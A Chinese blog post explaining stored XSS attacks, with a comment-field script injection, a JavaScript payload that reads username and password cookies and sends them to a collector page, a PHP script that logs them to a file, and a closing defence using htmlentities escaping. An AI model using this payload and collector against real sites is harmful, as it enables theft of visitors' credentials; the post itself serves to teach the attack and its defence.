博客列表 >XSS攻击原理

XSS攻击原理

小张的博客
小张的博客原创
2019年12月26日 16:26:511081浏览

原理:恶意Web用户将代码植入到提供给其它用户使用的页面中,如果程序没有经过过滤或者过滤敏感字符不严密就直接输出或者写入数据库。合法用户在访问这些页面的时候,程序将数据库里面的信息输出,这些恶意代码就会被执行。

大概流程是,建立一个用于发表评论的网页,然后XSS攻击者通过XSS漏洞进行攻击获取其他访问该网页的用户的cookie信息并记录到攻击者设定的文件中。

1.不法者登录你的网站进行评论,输入以下内容

  1. <script type="text/javascript" src="http://localhost/test/hack.js"></script>

2.你没有进行过滤或校验处理,直接存入数据库,并显示在网页中
3.后续其他用户评论时,提交的数据可能就被这段JS脚本给截获了

hack.js

  1. var username = getCookie('username');
  2. var password = getCookie('password');
  3. var script = document.createElement('script');
  4. script.src = 'http://localhost/test/index.php?username=' + username + '&password=' + password; //保存数据的页面的位置
  5. document.body.appendChild(script);
  6. function getCookie(name)
  7. {
  8. var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
  9. if(arr=document.cookie.match(reg))
  10. return unescape(arr[2]);
  11. return null;
  12. }

hack.js传送数据到index.php

  1. <?php
  2. if(!empty($_GET['password'])){
  3. $username=$_GET['username'];
  4. $password=$_GET['password'];
  5. try{
  6. $path=$_SERVER["DOCUMENT_ROOT"].'/password.txt';
  7. $fp=fopen($path,'a');
  8. flock($fp, LOCK_EX);
  9. fwrite($fp, "$username\t $password\r\n");
  10. flock($fp, LOCK_UN);
  11. fclose($fp);
  12. }catch(Exception $e){
  13. }
  14. }
  15. ?>

如何防止这种攻击呢?

上述XSS攻击的核心是利用了脚本注入,对用户的输入没有做出检查,信赖用户输入,因此如果我们不信赖用户输入,对特殊字符如”<”,”>”转义,就可以从根本上防止这一问题。更简单一点说,不要直接echo输出,换成用PHP的htmlentities函数将所有的评论不是以嵌入HTML的形式,而是以纯文本直接展示在页面中,这样无论如何都可以确保不会修改到HTML的DOM元素,而导致恶意代码的嵌入。

声明:本文内容转载自脚本之家,由网友自发贡献,版权归原作者所有,如您发现涉嫌抄袭侵权,请联系admin@php.cn 核实处理。
全部评论
文明上网理性发言,请遵守新闻评论服务协议